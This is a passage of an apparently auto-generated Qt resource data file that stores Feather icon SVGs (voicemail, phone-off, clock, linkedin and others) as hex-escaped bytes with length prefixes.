\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x76\x6f\x69\x63\x65\
\x6d\x61\x69\x6c\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\
\x3d\x22\x35\x2e\x35\x22\x20\x63\x79\x3d\x22\x31\x31\x2e\x35\x22\
\x20\x72\x3d\x22\x34\x2e\x35\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\
\x65\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x38\
\x2e\x35\x22\x20\x63\x79\x3d\x22\x31\x31\x2e\x35\x22\x20\x72\x3d\
\x22\x34\x2e\x35\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x35\x2e\x35\x22\x20\x79\x31\
\x3d\x22\x31\x36\x22\x20\x78\x32\x3d\x22\x31\x38\x2e\x35\x22\x20\
\x79\x32\x3d\x22\x31\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x38\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x6c\x61\x73\x68\
\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\
\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\x22\
\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x34\x2e\x39\x33\x22\x20\x79\x31\x3d\x22\x34\x2e\
\x39\x33\x22\x20\x78\x32\x3d\x22\x31\x39\x2e\x30\x37\x22\x20\x79\
\x32\x3d\x22\x31\x39\x2e\x30\x37\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x37\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x6f\x75\x73\x65\
\x2d\x70\x6f\x69\x6e\x74\x65\x72\x22\x3e\x3c\x70\x61\x74\x68\x20\
\x64\x3d\x22\x4d\x33\x20\x33\x6c\x37\x2e\x30\x37\x20\x31\x36\x2e\
\x39\x37\x20\x32\x2e\x35\x31\x2d\x37\x2e\x33\x39\x20\x37\x2e\x33\
\x39\x2d\x32\x2e\x35\x31\x4c\x33\x20\x33\x7a\x22\x3e\x3c\x2f\x70\
\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x33\
\x20\x31\x33\x6c\x36\x20\x36\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x4f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x68\x6f\x6e\x65\
\x2d\x6f\x66\x66\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x31\x30\x2e\x36\x38\x20\x31\x33\x2e\x33\x31\x61\x31\x36\x20\x31\
\x36\x20\x30\x20\x30\x20\x30\x20\x33\x2e\x34\x31\x20\x32\x2e\x36\
\x6c\x31\x2e\x32\x37\x2d\x31\x2e\x32\x37\x61\x32\x20\x32\x20\x30\
\x20\x30\x20\x31\x20\x32\x2e\x31\x31\x2d\x2e\x34\x35\x20\x31\x32\
\x2e\x38\x34\x20\x31\x32\x2e\x38\x34\x20\x30\x20\x30\x20\x30\x20\
\x32\x2e\x38\x31\x2e\x37\x20\x32\x20\x32\x20\x30\x20\x30\x20\x31\
\x20\x31\x2e\x37\x32\x20\x32\x76\x33\x61\x32\x20\x32\x20\x30\x20\
\x30\x20\x31\x2d\x32\x2e\x31\x38\x20\x32\x20\x31\x39\x2e\x37\x39\
\x20\x31\x39\x2e\x37\x39\x20\x30\x20\x30\x20\x31\x2d\x38\x2e\x36\
\x33\x2d\x33\x2e\x30\x37\x20\x31\x39\x2e\x34\x32\x20\x31\x39\x2e\
\x34\x32\x20\x30\x20\x30\x20\x31\x2d\x33\x2e\x33\x33\x2d\x32\x2e\
\x36\x37\x6d\x2d\x32\x2e\x36\x37\x2d\x33\x2e\x33\x34\x61\x31\x39\
\x2e\x37\x39\x20\x31\x39\x2e\x37\x39\x20\x30\x20\x30\x20\x31\x2d\
\x33\x2e\x30\x37\x2d\x38\x2e\x36\x33\x41\x32\x20\x32\x20\x30\x20\
\x30\x20\x31\x20\x34\x2e\x31\x31\x20\x32\x68\x33\x61\x32\x20\x32\
\x20\x30\x20\x30\x20\x31\x20\x32\x20\x31\x2e\x37\x32\x20\x31\x32\
\x2e\x38\x34\x20\x31\x32\x2e\x38\x34\x20\x30\x20\x30\x20\x30\x20\
\x2e\x37\x20\x32\x2e\x38\x31\x20\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x2d\x2e\x34\x35\x20\x32\x2e\x31\x31\x4c\x38\x2e\x30\x39\x20\
\x39\x2e\x39\x31\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x32\x33\x22\x20\x79\x31\x3d\x22\x31\
\x22\x20\x78\x32\x3d\x22\x31\x22\x20\x79\x32\x3d\x22\x32\x33\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x74\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x68\x6f\x70\x70\
\x69\x6e\x67\x2d\x62\x61\x67\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\
\x3d\x22\x4d\x36\x20\x32\x4c\x33\x20\x36\x76\x31\x34\x61\x32\x20\
\x32\x20\x30\x20\x30\x20\x30\x20\x32\x20\x32\x68\x31\x34\x61\x32\
\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x2d\x32\x56\x36\x6c\x2d\
\x33\x2d\x34\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x33\x22\x20\x79\x31\x3d\x22\x36\x22\
\x20\x78\x32\x3d\x22\x32\x31\x22\x20\x79\x32\x3d\x22\x36\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x31\x36\x20\x31\x30\x61\x34\x20\x34\x20\x30\x20\x30\x20\x31\
\x2d\x38\x20\x30\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\
\x76\x67\x3e\
\x00\x00\x01\x60\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x61\x75\x73\x65\
\x2d\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\
\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\
\x20\x72\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x30\x22\x20\x79\
\x31\x3d\x22\x31\x35\x22\x20\x78\x32\x3d\x22\x31\x30\x22\x20\x79\
\x32\x3d\x22\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x31\x34\x22\x20\x79\x31\x3d\x22\x31\
\x35\x22\x20\x78\x32\x3d\x22\x31\x34\x22\x20\x79\x32\x3d\x22\x39\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3e\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x68\x65\x76\x72\
\x6f\x6e\x73\x2d\x6c\x65\x66\x74\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x31\x20\x31\
\x37\x20\x36\x20\x31\x32\x20\x31\x31\x20\x37\x22\x3e\x3c\x2f\x70\
\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x38\x20\x31\x37\x20\
\x31\x33\x20\x31\x32\x20\x31\x38\x20\x37\x22\x3e\x3c\x2f\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x45\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x77\x61\x72\x64\
\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\
\x22\x20\x63\x79\x3d\x22\x38\x22\x20\x72\x3d\x22\x37\x22\x3e\x3c\
\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x38\x2e\x32\x31\x20\x31\
\x33\x2e\x38\x39\x20\x37\x20\x32\x33\x20\x31\x32\x20\x32\x30\x20\
\x31\x37\x20\x32\x33\x20\x31\x35\x2e\x37\x39\x20\x31\x33\x2e\x38\
\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x53\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x64\x69\x76\x69\x64\
\x65\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\
\x32\x22\x20\x63\x79\x3d\x22\x36\x22\x20\x72\x3d\x22\x32\x22\x3e\
\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x35\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\
\x3d\x22\x31\x39\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\
\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x38\x22\x20\x72\x3d\x22\
\x32\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x38\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x72\x6e\x65\
\x72\x2d\x75\x70\x2d\x6c\x65\x66\x74\x22\x3e\x3c\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x39\x20\x31\
\x34\x20\x34\x20\x39\x20\x39\x20\x34\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x32\x30\x20\x32\x30\x76\x2d\x37\x61\x34\x20\x34\x20\x30\x20\x30\
\x20\x30\x2d\x34\x2d\x34\x48\x34\x22\x3e\x3c\x2f\x70\x61\x74\x68\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x30\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6c\x6f\x63\x6b\
\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\
\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\x22\
\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x32\x20\x36\
\x20\x31\x32\x20\x31\x32\x20\x31\x36\x20\x31\x34\x22\x3e\x3c\x2f\
\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x90\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6c\x69\x6e\x6b\x65\
\x64\x69\x6e\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\
\x36\x20\x38\x61\x36\x20\x36\x20\x30\x20\x30\x20\x31\x20\x36\x20\
\x36\x76\x37\x68\x2d\x34\x76\x2d\x37\x61\x32\x20\x32\x20\x30\x20\
\x30\x20\x30\x2d\x32\x2d\x32\x20\x32\x20\x32\x20\x30\x20\x30\x20\
\x30\x2d\x32\x20\x32\x76\x37\x68\x2d\x34\x76\x2d\x37\x61\x36\x20\
\x36\x20\x30\x20\x30\x20\x31\x20\x36\x2d\x36\x7a\x22\x3e\x3c\x2f\
\x70\x61\x74\x68\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x32\x22\
\x20\x79\x3d\x22\x39\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x34\x22\
\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x72\
\x65\x63\x74\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\
\x34\x22\x20\x63\x79\x3d\x22\x34\x22\x20\x72\x3d\x22\x32\x22\x3e\
\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x4a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
